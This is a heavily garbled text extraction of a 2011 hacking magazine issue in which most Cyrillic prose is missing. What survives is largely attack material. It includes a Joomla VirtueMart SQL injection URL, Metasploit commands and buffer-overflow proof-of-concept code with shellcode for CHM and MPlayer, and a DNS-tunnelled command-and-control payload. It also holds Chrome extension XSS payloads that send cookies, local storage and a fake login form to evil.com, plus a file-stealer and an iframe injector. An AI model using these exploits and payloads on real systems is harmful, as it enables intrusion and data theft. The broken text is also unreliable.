Software Restriction Policies (SRP).
Windows Program Files.
? :
Read Execute, -
, .
- , .
, SRP
, .
(. ). . ?
, :). .
, , ,
,
, .
.
.
1. - .
X 06 /149/ 2011
DVD
dvd

DVD.

2. .
3. .
4. -.
( , , ) , ,
.
, ,
.
, cached
domain credentials ( ). , . ,
.
. , ?
.
. ,
: Vista, 7-. ,
- , ,
. :).
. , -, (explorer.
exe, ) ( )
/ SRP.
, . . -,
() .
. explorer.exe ()
Windows. /,
(execute). explorer.exe,
,
.
, , .
OllyDbg ,
, .
, , ,
X 06 /149/ 2011
,
- . - :).
, . , SRP, , , . :
1. -,
().
2. dll-,
dll-.
3. -
( ).
4.
.
5. dll
, .
6. , , ,
, .
,
.
: goo.gl/BDIQt. (gpdisable.zip), ,
Microsoft -, , -,
, -, , -, .
, GPCul8or .
. . :
Gpdisable.exe c:\windows\explorer.exe
HKLM\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_
DLLs,
. .

.
goo.gl/ucrhQ, , 100% .
, . z
041

iv (ivinside.blogspot.com)
pikofarad
. ,
:
CVSS v2 Base Score
.
01
SQL JOOMLA! COM_

VIRTUEMART
CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
CMS Joomla .
-
Virtuemart. Stratsec SQL .
-.
EXPLOIT
'com_virtuemart/classes/ps_module.php' get_dir(), 255-270:
function get_dir($basename)
{
$datab = new ps_DB;
$results = array();
$q = "SELECT module_perms FROM #__{vm}_module where
module_name='".$basename."'";
$datab->query($q);
if ($datab->next_record()) {
$results[ 'perms' ] = $datab->f("module_perms");
return $results;
}
else {
return false;
}
}
, . $basename . ,
042
, e GET-
page, 'com_virtuemart/virtuemart_parser.
php', 189-210:
if( $option == "com_virtuemart" ) {
if (empty($page)) {// default page
if (defined('_VM_IS_BACKEND')) {
$page = "store.index";
{
else {
$page = HOMEPAGE;
}
}
// Let's check if the user is allowed to view the page
// if not, $page is set to ERROR_PAGE
$pagePermissionsOK = $ps_module->checkModulePermissions(
$page );
checkModulePermissions()
'com_virtuemart/classes/ps_module.php'
page. get_dir(),
:
function checkModulePermissions( $calledPage ) {
global $page, $VM_LANG, $error_type, $vmLogger, $perm;
// "shop.browse" => module: shop, page: browse
$my_page= explode ( '.', $page );
if( empty( $my_page[1] )) {
return false;
}
$modulename = $my_page[0];
$pagename = $my_page[1];
$dir_list = $this->get_dir($modulename);
:
1. , ( ).
X 06 /149/ 2011

chm- hex-
2. Joomla '<' '>' ,
'=' .
.
,
, . ,
MySQL 5 ,
30-60 :
http://[target]/[path]/index.php?option=com_virtuemart&
page=-1'+union+select+if(substring(@@version,1,1)=5,
benchmark(30000000,MD5('x')),null)--+fakemodule.
fakepage
benchmark(count, expr),
(count) ,
( MD5
'x'). ,
'substring(@@version,1,1)=5' . ,
@@version 5. MySQL
4- , , 4 5.
,
. :
exploit-db.com, ID 17132.
: ./17132.py [<>] -t [:] -d
[_]
: ./17132.py -p localhost:8080 -t
192.168.1.7 -d /webapps/joomla/
-,
'-p',
:.
,
.
- ,
- -.

, e . , ,
, ,
mr_me, .
doBlindSqlInjection(). ,
X 06 /149/ 2011
, ,
163-176.
TARGETS
Joomla! com_virtuemart <= v1.1.7
SOLUTION
com_virtuemart 1.1.8 1.1.7.
02

VLC MEDIA PLAYER
CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
, ,
OllyDbg, VLC Media Player
AMV NSV. .
Dangling Pointer, ,
2007 Black Hat USA
(whitepaper ). libdirectx_plugin.dll 0x41-,
90. Internet Explorer
AMV,
IE.
EXPLOIT
26 Metasploit Framework
exploit/windows/browser/vlc_amv. :
#
$ msfconsole
#
use exploit/windows/browser/vlc_amv
# (
)
set PAYLOAD windows/exec
# ()
set CMD calc.exe
# (Windows XP SP3 IE6)
set TARGET 1
# ( process )
043
chm-
set EXITFUNC seh
# -!
exploit
, show
options, show payloads, show targets. ,
. exploit
- , .
TARGETS
VLC Media Player <= 1.1.7.
, Metasploit
Framework :
Windows XP SP3 + IE6;
Windows XP SP3 + IE7;
Windows Vista + IE7.
SOLUTION
1.1.8, .
03

MICROSOFT HTML HELP <= 6.1
CVSSV2
7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: HTMLHelp (Microsoft
Compressed HTML Help, Microsoft Compiled HTML Help, .CHM) ,
Microsoft 1997
WinHelp. HTML-,
,
,
. .CHM LZX.
.CHM- ,
Microsoft Windows, Windows
98, Windows NT. , , FBReader . .CHM-
Microsoft HTML Help
Workshop, Htm2Chm, Total Commandera,
.
044
,
l_memmove_call
EXPLOIT
itss.dll, hh.exe (, Microsoft HTML Help)
chm-, .
,
, .
(WinXP SP3):
.text:6638B251 8B 87 28 01 00 00
mov
.text:6638B257 03 45 0C
add
.text:6638B25A 56
ush
; - ,
.text:6638B25B 50
push
; ()
.text:6638B25C FF 75 08
push
; ,
.text:6638B25F E8 0B CC FE FF
call
; memmove (memcpy ) <--- Stack
eax, [edi+128h]
eax, [ebp+arg_4]
esi
eax
[ebp+Dst]
l_memmove_call
overflow
, ,
,
, chm-.
,
/#WINDOWS ( 0 , ,
).
call 0x3ff7
0xb9b58 0x7f998,
, , .
, l_memmove_call
( memmove memcpy win7)

itss.dll,
...
chm- :
HTML Help Workshop;
HTML Help Workshop,
;
HTML Help table of
X 06 /149/ 2011
MPlayer Lite 33064
: pop,pop,ret
SEH-
profit.
test.hhc:
<HTML><BODY><UL><LI><OBJECT type="text/sitemap">
<param name="Name" value="test">
<param name="Local" value="test.htm">
</OBJECT></UL></BODY></HTML>
test.htm:
<HTML>
<BODY>
<img src="poc.gif">
</BODY>
</HTML>
strcpy
contents (.hhc) HTML files (.htm);
test.hhc, test.htm;
Add/Modify window definitions,
- ;
chm- (File Compile);
chm- hex-;
/#WINDOWS;
0x01, 3- 3-
0x00 0xff 0x7f;
, ,
3- ,
. ,
EIP , EIP
, 0x7fffffff.
16- (destination + 0x1c8),
, .
, ,
,
poc.gif. ,
X 06 /149/ 2011
045

- MSF
.
: .
import sys
begin_of_gif = "\x47\x49\x46\x38\x39\x61\xD8\x00\xD8" +
"\x00\xD5\xFF\x00" + "\x90" * 6
#
nextSEHoverwrite = "\xeb\x06\x90\x90"
# , ;
#
# pop, pop, ret
SEHoverwrite = "\x81\x81\x81\x81"
nopsled = "\x90"*0x1e5
# win32_exec EXITFUNC=process CMD=calc.exe Size=164
Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4'
payload += '\x5b\x81\x73\x13\x6f\x02\xb1\x0e\x83\xeb\xfc'
payload += '\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b\x53'
payload += '\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51'
payload += '\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71'
payload += '\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0'
payload += '\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b'
payload += '\x03\x5a\x68\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5'
payload += '\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1\x80'
payload += '\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42'
payload += '\xbd\x85\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4'
payload += '\x82\x01\x0e\x6f\x02\x3a\x66\x53\x5d\x80\xf8'
046
Google 230 000 000

com_virtuemart
payload += '\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69'
payload += '\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
new_gif = open("poc.gif", "wb")
new_gif.write(begin_of_gif +
nextSEHoverwrite +
SEHoverwrite +
nopsled +
payload +
"\xcc"*0x1000)
TARGETS
Windows ( , Windows 7).
SOLUTION
.
X 06 /149/ 2011
Joomla! com_virtuemart
04

MPLAYER LITE 33064 (SEH)
CVSSV2
6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Mplayer WW Windows
mplayer, (MPEG/
VOB, AVI, Ogg/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, RealMedia,
Matroska, NUT, NuppelVideo, FLI, YUV4MPEG, FILM, RoQ, PVA), , XAnim Win32 DLL .
Mplayer VideoCD,
SVCD, DVD, 3ivx, DivX 3/4/5, WMV H.264.
MPlayer
. X11, Xv,
DGA, OpenGL, SVGAlib, fbdev, AAlib, DirectFB, VESA ( VESA , X11)
( Matrox, 3Dfx ATI),
GGI, SDL ( ).
,
.
MPlayer MPEG, Siemens DVB, DXR2 DXR3/Hollywood+.
19 2011 C4SS!0 h1ch4m ,
mplayer ww m3u-.
.
EXPLOIT
m3u-, mplayer, strcpy, , 0xbc8008,
0x22ebb8.
.
:
0056173E C78424 78040000> MOV DWORD PTR SS:[ESP+478],8D48E0
; ASCII "*.rar"
00561749 C78424 7C040000> MOV DWORD PTR SS:[ESP+47C],0
00561754 895C24 04
MOV DWORD PTR SS:[ESP+4],EBX
00561758 890424
MOV DWORD PTR SS:[ESP],EAX
0056175B E8 A8032900
CALL 007F1B08
; <JMP.&msvcrt.strcpy> <--- Stack overflow
00561760 8D9424 68020000 LEA EDX,DWORD PTR SS:[ESP+268]
00561767 C74424 04 2F000> MOV DWORD PTR SS:[ESP+4],2F
SEH-.
X 06 /149/ 2011
, , SEH-
pop pop ret, Next SEH.
nop- (nopsled),
\xE9\xD4\xEB\
xFF\xFF, nop-,
.
,
. ,
.
POC-:
my $buf
$buf .=
$buf .=
$buf .=
= "\x90" x 100;
$payload;
"\x41" x (5152-length($buf));
"\xeb\x0f\xcc\xcc"; # Next SEH
# pop pop ret (SEH)

# avcodec-52.dll, mplayer
lite 33064
$buf .= pack('V', 0x6B04FCDE);
$buf .= "\x90" x 15;
$buf .= "\xE9\xD4\xEB\xFF\xFF";
$buf .= "\x90" x 400;
TARGETS
Mplayer Lite 33064
SOLUTION
, m3u-,
. z
047

, Digital Security (twitter.com/asintsov)
DNS:

payload

, , ,
.
.
Previously on ][
, , ,
-,
. -
Metasploit, ,
DNS .
, ,
DNS-,
, (
). DNS-
. , ,
- - .
.
:
1. . - ,
DNS- _popen. ,
(data_data_data): _popen(nslookup
data_data_data.domen.ru,r). , , , .
048
2. msvctrl.dll. -
msvctrl, . , -
.
3. . - . ,
, .
, .
4. ,
.
5. , -
.
, , , .
, ? , , ,

.
- . ,
, C&C
DNS-. , , Acrobat
Reader , , ,
X 06 /149/ 2011
:
DNS-
:)
DNS
DNS-

DNS
DNS
-.
download&exec-.
HTTP, DNS,
.
, , , DNS.
, -,
. , kernel32.dll, . -
LoadLibrary
GetProcAddr. ,
.
: _popen (
),
WinExec,
. . _popen, nslookup ( ). WinExec
, CreateProcess .
WS2_32.dll getaddrinfo.
IP- .
-
(Acrobat Reader, ). DNS-
svchost.exe, UAC .
, WIN API :). , ,
X 06 /149/ 2011
: ?
IP-.

,
14 , 17 .
: aaaa, baaa,
caaa .
17x14 . , DNS 238 (0xEE) . 17 14?
, IPv6-,
16 , 17 .
. ,
- getaddrinfo (aaaa.domain.ru)
17 IP-. -
, .
,
( 14 , ), 14 . . -
,
14 17 . 29 010203040506..272829:
000e:0102:0304:0506:0708:0910:1112:1314
0e0e:1516:1718:1920:2122:2324:2526:2728
1c01:2900:0000:0000:0000:0000:0000:0000
238 , , . ,
%TEMP%-, ( -).
- 238 (baaa.domain.ru)
. ,
.
WinExec .
- . , -
Windows 7 x64 ( 32- !)
Windows XP SP2 x32, IPv6 .
049
DNS
,
! :
1. kernel32.dll.
2. GetProcAddr.
3. Loadlibrary.
4. WinExec,
gettaddrinfo, exit, fopen, fwrite, fclose .
5. .
6. , .
7. getaddrinfo.
8. aaaa.domain.ru, baaa.domain.ru
.
8.1 IP-,
.
8.2 .
9. .
10. .
, .
, N
C&C- .
. .
,
, .
, ,
, , :
sleep
exit
< >
-

cmd /s < >
(), - .
XR.[name1][name2].domain.ru. name1 , name2 .
.
, , -
- . : XG.[name1][name2].domain.ru.
, IP-, IPv4.
, ,
txt-, .
TXT , ,
IDS-,
050
IP- , . : 1.1.1.1
, , .
IP-, , (, 84 ,
-!). . , ipconfig.
. , , DNS-
+, / =, base64.
: XX.<N>.<base64>.domain.ru, <N>
( ,
). <N> FI.
, . ,
, .
, exe-
,
. . VBS,
. nslookup
. . , .
. ,
. .
.
, , ,
. ,
, sleep.
.
, . ,
, ,
. timeout,
. .
, <CTRL-C> .
, .
CTRL-C.

.
sleep.
, dnsBOT.
name1.name2.txt ( ),
. , CTRL-C.
X 06 /149/ 2011
-
:)
windows. , ( Acrobat Reader), .

:
, ,
, , :).
. :
, .
revdns.pl, 53 . :
$EGG="d:\\DROP.VBS";
$defaultcmd="ipconfig";
$DOMAIN="dom.com";
$IPA="127.0.0.1";
#
#
#
#

IP- DNS
, , DNS
: (,
) . : nslookup q=AAAA aaaa.dom.com
238 DROP.VBS.
, DROP.VBS:
DOMAIN="dom.com"
, -,
. . dnsdrop.rb
, c:\<MSF>\modules\payloads\singles\
X 06 /149/ 2011
set DOMAIN=dom.com
set FILE=vbs
PDF , .
, perl
. ,
.

.
, DNS . , PoC ,
DNS
, , , ! , - CONFidence 2011
DSecRG. , ,
][!
, ,
( /)

!
P.S.
, . z
051

(alumni.samara@gmail.com)
Cisco

,
VPN
? .

(VPN)
.
() ,
IP Ethernet. -, ,
- ,
. , ,
( ).
052
Ethernet
VLAN. , , -.
VLAN .
, Dynamips,
Cisco
Windows.
Cisco IOS (
).
X 06 /149/ 2011
idlepc get routername

Dynamips -: Dynagen GNS3
( Dynamips).
Dynagen (dynagen.org).
:
Dynagen Sample Labs
Cisco;
Dynamips Server ;
Network device list ,
( , );
Pemu Server Cisco PIX.

. Cisco IOS 7200,
Dynamips, , .
,
c3745-advipservicesk9-mz.124-15.T6.bin.
Dynagen ,
Cisco IOS, ,
7z rar,
.

DATA-
Dynagen *.net,
, .
,
:
# Simple Cisco 3745 with 2 real interfaces
autostart = False
[localhost]
[[3745]]
image = \Program Files\Dynamips\images\
c3745-advipservicesk9-mz.124-15.T6.bin
idlepc = 0x613f07b4
npe = npe-300
ram = 160
[[ROUTER R1]]
console = 2000
model = 3745
cnfg = configs\cisco_3745.cfg
slot1 = NM-16ESW
slot2 = PA-2FE-TX
F1/0 = NIO_gen_eth:\Device\
NPF_{7C94C2DF-C005-489D-9E50-3199AEFE6F27}
F2/1 = NIO_gen_eth:\Device\
NPF_{3209EAAB-22CD-453A-965A-D02490DB7EDE}
X 06 /149/ 2011
Network device list

, , .
[localhost] , Dynamips.
[[3745]] ,
. [localhost].
, ,
localhost. ,
Cisco 3745, .
image Cisco IOS
c3745-advipservicesk9-mz.124-15.T6.bin.
,
.
npe = npe-300
3745 Network Processing Engine 300.
ram = 160
160 .
, ,
,
,
, 256
.
idlepc = 0x613f07b4 ,
.
100%. ,
.
telnet , enable-,
.
Dynagen idlepc get routername (
idlepc get R1).
,
.
<Enter>. CPU
.
. idlepc show
routername ( idlepc show R1).
, ,
- . ,
,
.
[[ROUTER R1]] , . R1 , Dynamips, hostname
.
slot1 = NM-16ESW 1
NM-16ESW (FastEthernet 16 ),
.
slot2 = PA-2FE-TX 2
PA-2FE-TX (FastEthernet 2 ).
, , .
cnfg = configs\cisco_3745.cfg ,
INFO
info
Dynamips

PIX (Private Internet
Exchange).

,

VLAN ID
trunk.

Metasploit

STP spoof/cisco/
stp spoof/cisco/
pvstp.
VLANe,

VLAN, ,

.
053
trunk
trunk

Cisco

Metasploit Framework
,
, BGP (Border
Gateway Protocol, ),
FullView (), .

- Quagga.

. , , vk.com/club21939124
.
Dynamips Server,
3745_router.net (
). 2 :
Dynamips .
,
:
List ;
Start ;
Start /all ;
Start R1 R1 ( );
Stop ;
Stop /all ;
Stop R1 R1 ( );
Telnet ;
Telnet /all ;
Telnet R1 R1 ( ).
, Telnet, F1/0 access
port VLAN1 trunk port native VLAN1 VLAN2. ,
.
trunk DTP
(Dynamic Trunk Protocol)

. Cisco Catalyst
mode access, mode trunk,
DTP .
,
.

VLAN. , ,
VLAN,
.
,
-
054

. , Cisco
DTP,

.
Auxiliary/spoof/ciso/dtp (metasploit.com/
modules/auxiliary/spoof/cisco/dtp)
. -
RHOST IP-
RUN. IP- ? ,
WireShark.
VLAN 10,
, .
(, SW0, . ) -
,
, trunk Cisco.
D Cisco,
D-Link, D STP.
, DTP ,
,
xDSL FTTP,
STP D-Link
VLAN. STP
. ,
X 06 /149/ 2011
IP- WireShark
_Forge Cisco D Packets
Forge Spanning-Tree BPDUs

,
,
. ,
,

.
,
( ) STP
, c.
, ,
,
(, SW0 SW1 SW0 R1, . ).
BPDU metasploit-
Forge Spanning-Tree BPDUs,
.
SW0 SW1 ( SW0 R1) , . ,
? Ethernet-, X 06 /149/ 2011
,
ADSL-, .
, D
( ip), RUN, Metasploit .
MAC- .
, ! , , ,
, Windows XP,
: support.microsoft.com/kb/315236.
SW0 R1,
, WireShark.
R1,

.
, VLAN ,
.
Windows XP,
Cisco (
) , NM-16ESW.
,
Cisco,
.
, , 1 /, 100
/.
. , - , .
,
, , , .
, -
, . ,
,
, , . z
055

A X 330 D
(ax330d@gmail.com)
PHP-

-
, PHP. ,
!
. ,
,
,
PHP.

, , , ,
, ,
. - ,
.

-? . , ,

, , RIPS...
, ,

WinMerge. , , , -
056
?
, .
, ,
.
. , ,
, .
,
. ,
, -, PHP. - Zend,
PHP, . PHP, hello, world? ,
.
X 06 /149/ 2011
, Zend
Engine . , ,
PHP Extending and Embedding
PHP, ,
. - Advanced PHP Programming, ,
, . - PHP,
...
, PHP .
, , , ,
PHP. ,
.
, .
,
. PHP,
.
Zend Engine, : ,
. PHP mysql,
zlib, curl . SAPI
API, CLI, mod_php, fastcgi.
, ,
PHP.
,
, , . ,

, ,
. -. ,
. -
(op_array) zend_execute().
,
, .

JMP, CALL, SWITCH.
, ,
-.
,
. , APC, ,
, .
-. -,
,
Zend.

op_array.
, , , .
, , ,
_zend_op.
Zend/zend_compile.h
X 06 /149/ 2011
HTTP://WWW
links

PHP-
1. bytekit:
bytekit.org;
2. vld:
pecl.php.net/package/vld;
3.
evalhook:
goo.gl/UVq6y;
4. PHP:
php.net/manual/en/
internals2.php;
5.
Stefan Esser
PHP:
goo.gl/PtWdE;
6. DVWA: dvwa.co.uk.
:
struct _zend_op {
opcode_handler_t handler;
znode result;
znode op1;
znode op2;
ulong extended_value;
uint lineno;
zend_uchar opcode;
};
op1 op2,
, :
VAR ( $);
TMP , , ( ~);
CV , VAR ( !);
CONST , ,
;
UNUSED ;
result,
, VAR, TMP, CV.
,
0 153 (PHP 5.3.6), Zend/
zend_vm_opcodes.h.
, 116 131 .
, PHP
.
4 ,
5.1. . ,
5.1,
CV,
25 . ,
,
.
!n , ,
DVD
dvd
evalhook
.
057
vld
PHP $var.
, , (, html), PHP, :
<?php
$var = 1;
?>
<html>
...
PHP ECHO.
, ,
. , PHP .
, , echo(). ,
.
bytekit.
,
PHP 5.2.*. .
PHP 5.3. .
, PHP, 384 ,
(, scan_eval.php)
. , , ,

, , . , , . .
PHP Vulcan Logic Dumper (vld) bytekit. , , .

058
:
phpize
configure
make
make install
php.ini, :
extension=bytekit.so
extension=vld.so
, -d
extension=bytekit.so PHP. ,
.
,
bytekit ( bytedis) .

,
( *.dot)
Zynamics
BinNavi ( php2sql). ,
-
parsekit, , ,
segfault, . bytekit
, ZenGuard, ionCube.
,
, .
,

. ,
.
( )
X 06 /149/ 2011
PHP-
evalhook. ,
eval()
preg_replace() e, create_function(), assert().

, evalhook
, , , ,
.
zend_compile_string(), ,
. evalhook
Month Of PHP Bugs (
web).
evalhook ,
.
, - ,
.

.
, ,
- . ,
.
, :).
.
DVWA 1.0.7
, , SQL-
FI.
XDebug, .
dot,
. bytekit
, .
,
. examples,
:
php php2dot_simple.php /var/www/htdocs/h/dvwa/
vulnerabilities/sqli/source/low.php sqli-l
,
, . *.dot *.svg-. *.svg, *.dot
*.png :
dot -Tpng -o ./xxx.png xxx.dot
, . X 06 /149/ 2011
059
p
q
. ,
, . n.
? ,
-
PHP, . , ,
.
vld:
php -d extension=vld.so -dvld.active=1 /var/www/dvwa/
vulnerabilities/sqli/source/low.php
,
.
. , ,
main() C,
.
, SQL-.
? :
SQL- 9, 6.
~5 , ,
,
!0. ,
39, . ASSIGN
9 !1
~5. !0. ,
. o.

'Submit' $_GET, JMPZ
48 , 0, , .
, RETURN 1.
7 ,
-
$_GET. FETCH_R $2,
FETCH_DIM_R 'id'
$3. *_R read.
*_W write, , *_RW read/write,
060
. , ,
$3 ( PHP) !0. . SEND_VAR
,
, !1.
. , DO_FCALL mysql_query()
$7.
, ,
, -
.
, -
, . JMPNZ_EX. ?
xor ~9 $8.
, 0,
19 ( vld). ,
p.
. , ,
FREE ,
. ,
.
dvwa/
vulnerabilities/fi/index.php dvwa/vulnerabilities/fi/source/
medium.php.
. INCLUDE, REQUIRE,
. ,
REQUIRE_ONCE
, ~2.
.

. ~24 ~22 ~23.
. !1 . ,
q. , PHP
, :
X 06 /149/ 2011
$variable = 'low.php';
,
. .
, , ,
INCLUDE. , !2.
,
. ?
, ,
.
medium.php.
. ,
, !2.
!0, . ,
, ,
!0
str_replace(). . , ,
.
, index.php,
,
.
,
, ?
. DO_FCALL, DO_FCALL_
BY_NAME, INCLUDE_OR_EVAL, ECHO.
, , . ,
-, ,
,
.
, . ,
. .
? , SQL, , , ,
.
FETCH_R, FETCH_W
. ASSIGN
PHP. , ,
,
, .
, , . ,
,
IDA. PHP, ,
.
? , , , ,
. PHP,
, , .
,
. ,
:).
, PHP: bytekit
X 06 /149/ 2011
API, . examples/
FI:
php -d extension=bytekit.so bytekit-0.1.1/examples/
check_include.php index.php
index.php(30): require_once DVWA_WEB_PAGE_TO_ROOT.
"vulnerabilities/fi/source/{$vulnerabilityFile}";
index.php(35): include($file);
, eval:
/var/www$ php -d extension=bytekit.so bytekit-0.1.1/
examples/scan_eval.php ./
/var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/
htmlpurifier/HTMLPurifier/VarParser/Native.php(17):
$result = eval("\$var = $expr;");
PHP Warning: bytekit_disassemble_file(): bytekit_get_next_
oplines: found throw outside of try/catch in /home/ams/
Desktop/bytekit-0.1.1/examples/scan_eval.php on line 19
/var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/
htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.
php(140): return eval('return array('. $contents .');');
, - , , grep?
, -, , , .
, , ,
PHP. ,
, ,
.
, . , , .
,
, .
, ,
. , PHP ,
, .
,
. . . ,
,
.
, !
, , .
, , ,
,
.

, . , ,
PHP, :). z
061

(oxdef.info)
GOOGLE
CHROME

Google Chrome
. ,
.
, .
, Chrome.
Googles
Chrome Extensions Show Security Focus (bit.ly/hvYkqO). , ,
. Chrome,
Firefox, . , ,
. -: HTML
JavaScript, HTML5 CSS.
,
(
JavaScript).
.
062
:
manifest.json e
: , , , ;
HTML-,
background.html, ;
: JS-,
( UserJS Greasemonkey );
: e , , -.
e zip- crx.

DOM-.
, X 06 /149/ 2011

XSS .

.
API- ,
, , , , .
, , ,

.
XSS
( 18 368 ) Gmail Google Mail

Checker Plus (bit.ly/g5L6DT).
e ,
.
.

, .
. , ,
?
2"'><script src="http://evil.com/own.js">
</script>
own.js JavaScript- :
document.body.innerHTML = "";
img = new Image();
img.src = "http://evil.com/stallowned.jpg";
document.body.appendChild(img);
, :

XSS :
! ,
Lostmon e 2010 ,
e, :). , , :
All extensions runs over his origin and no have
way to altered data from extension or get sensitive
data like, email account or password etc..
,
:). , X 06 /149/ 2011
XSS-.

document.cookie

API. ( )

, :
{
"name": "My extension",
...
"permissions": [
"cookies",
"*://*.google.com"
],
...
HTTP://WWW
links
HTML5:
dev.w3.org/html5/
}
spec/Overview.html;
, ,
,
:

. code.google.com/
chrome/extensions/
XSS ,
index.html;

e . :
, microformats.org/
wiki/hcard.
:
chrome.cookies.getAll({}, function(cookies)
{
var dump = "COOKIES: ";
for (var i in cookies) {
dump += cookies[i].domain + ":"
+ cookies[i].name + ":"
+ cookies[i].value + " | ";
}
img = new Image();
img.src = "http://evil.com/stallowned.jpg?"
+ dump;
});
,
,
XSS. e (
)
063
XSS Google Mail Checker Plus

- HTML5. ,
, , 100%. ,
, e
:
XSS Google Mail Checker Plus

,
XSS -.
-, , API
. ,
XSS , .
XSS Gmail
. , . HTML/JavaScript , <IMG>,
. e
! , - ,
. ,
JavaScript-:
var dump = '';
var e = document.getElementsByTagName('a');
i=0;
while(i < e.length) {
if (e[i].className == 'openLink') {
dump += e[i].innerText + ' | ';
}
i++;
}
img = new Image();
img.src = 'http://evil.com/sniff.jpg?' + dump;
,
. e
,
(, , ), e .
064
var dump = ' LOCALSTORAGE: ';

for (i = 0; i < localStorage.length; i++ ) {
dump += "KEY: " + localStorage.key(i);
dump += " VALUE: " + localStorage.getItem(
localStorage.key(i)) + " | ";
}
img = new Image();
img.src = 'http://evil.com/sniff.jpg?' + dump;
,
,
API. ,
XSS- .
- !

e :
var msg = 'Please, enter account information.';
msg += '<form action="http://evil.com/login">Username:
<input type=text name=user>';
msg += ' <br>Password: <input type=password
name=pass><br><input type=submit></form>';
document.body.innerHTML = msg;
, .
,
JSON
JSON ,
- web 2.0
.
Chrome :
"name": "Extension",
"version": "1.0",
"description": "Some extension",
"icons": { "128": "icon.png" },
"permissions": ["http://example.com/"],
"browser_action": {
"default_title": "",
"default_icon": "pic.png",
X 06 /149/ 2011
Google
Mail Checker Plus
"default_popup": "view.html"
}
}
Microformats extension
, JSON:
1. JavaScript eval() (, ).
Google JSON
JSON.parse.
2. ,
JSON- JavaScript hijacking (bit.ly/eQDXrv)
JSON(P),
.

-. ,
e
-. .

( ][
Greasmonkey ). URL- html- <A>, ,
.
(content script) , , JavaScript,
, ,
, .
,
API-. ,
:
chrome.* APIs ( chrome.extension);
, ;
, ;
XMLHttpRequests.
,
. ,
:
1. ,
, !
2. .
e
.
X 06 /149/ 2011
HTML- hCard.
URL , , ,
:
<div class="vcard">
<div class="fn">James Bond</div>
<div class="org">MI-6</div>
<div class="tel">604-555-1234</div>
<a class="url" href="123:<script>d = document.
createElement('div');d.innerHTML='<h1>XSS</h1>';
document.body.appendChild(d);</script>233">
http://example.com/</a>
</div>
,
, ,
.
, ?
e? .

OAuth API- .

. , JQuery, !
$(".submithcard").click()

API , ,
.
? Google Chrome .
, (HTML, CSS
JavaScript) - , , XSS,
-.
XSS , XSS
-. Security
considerations ,
! z
065

(icq 884888, snipper.ru)
X-TOOLS
: Flash grabber
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Gar|k
: Charon v0.6 SE
: Rhino (project2025.com) &
v1ru$
.
bit.ly/fYIvbq.
: DIR-300 PWNER
: TIMHOK

,

, ? Flash grabber.
:
,
. ,
.
-.
:
1. ;
2.
usb-;
3. ,
(
);
4. ,
,
;
5. ,
.
:
doc, docx,
ppt, pptx, rtf ;
(3.5 );
;

;
- ;
;
.

bit.ly/ew670z.
066
!
Charon.
,
v1ru$.
, Charon v0.6 SE ,
-
.
, ,
,
IP-,
- .
:

IP- , , ,
( );

-:
,
AngryIPScanner Superscanner;
- RBL;

-
;
HTTP (trans, anonim), ssl, socks4/5;
-;
GeoIP;
-

pwner
Dir-300.

, ,
2.05B03, 2.04,
2.01B1, 1.05B09, 1.05, 1.04, DIR-615 +
4.13B01 , ,
. .
pwner :
1. cmd;
2. ipconfig, IP;
3. IP,
( , IP 10.2.4.64,
10.2.4.0);
4. (, 10.2.4.255);
5. ( Dir-300, pwn
);
6. Go;
7. , .

X 06 /149/ 2011
.
IP .

admin
( ). .

:). , : bit.ly/gJEL38.
: Sharecash Survey
Helper
: TickTack

Sharecash Survey Helper ,
. ,
- .

, .
: First name, Last
name, Address, City, State, Zip, Email, Birthday,
Phone. ,
Zip ,

. , .NET Framework 4.0.
bash Perl.
php/html. : ,
,
IE. ,
, .
,
html-.

, .
( ,
ftp) . Shadow
iframer .

: root
(,
)
nobody ( ,
).
: -.
index-
body.
:
# ./iframe.sh
[*]Searching for perl.../usr/bin/perl
[*]Starting index finder...please
wait...search complete. Found X pages
[*]Generating iframer...complete.
Starting iframer
[*] Injecting complete, deleting temp
files...
[*] Finished
: VkAksEnter
: IOFFE

: http://bit.ly/ePt36Y.
: Antigate Balance
: Zdes Bil Ya
: Shadow iframer[local]
: *nix
: Gh0s7

antigate.com
, , -
X 06 /149/ 2011
Zdes Bil Ya. ,

antigate.com?
?
Antigate Balance.
, Antigate Balance

antigate.com ( ).
:
;
;
;
.
:
,
.

.
Zdes Bil Ya
bit.ly/eJbNku. ,
.

,
,
.
, VkAksEnter
, , .
:
;
antigate.com;
/ (
);
/ ;
/ .
ioffe-soft.ru/?p=412. z
067
MALWARE


PE, , -.
BlackHole exploit kit. ,
,
. ,
-.
, .
( )
( ).
. ,
, ,
. -
068
, . :
<html>
<head>
<script language='javascript'>
location.href =
'http://******.net/index.php?tp=98a8c9d4da3191f5';
X 06 /149/ 2011
. 1. html-, div
. 3.
-. 404 , PDF Java
</script>
<body>
</body>
</html>
HTML-, location.href=.

BlackHole, .
Hiew. ? ,
<html> <body>, asd:
.asd {width:0;height:0;overflow:hidden;}
div - (-,
) . ,
,
, .
JS, , ,
<div> (. 1).
.
FireBug FireFox,
MSDN, .
, .
eval , <div>. ,
, - ,
, (v*1,22222). ,
fromCharCode,
ANSI-. ,
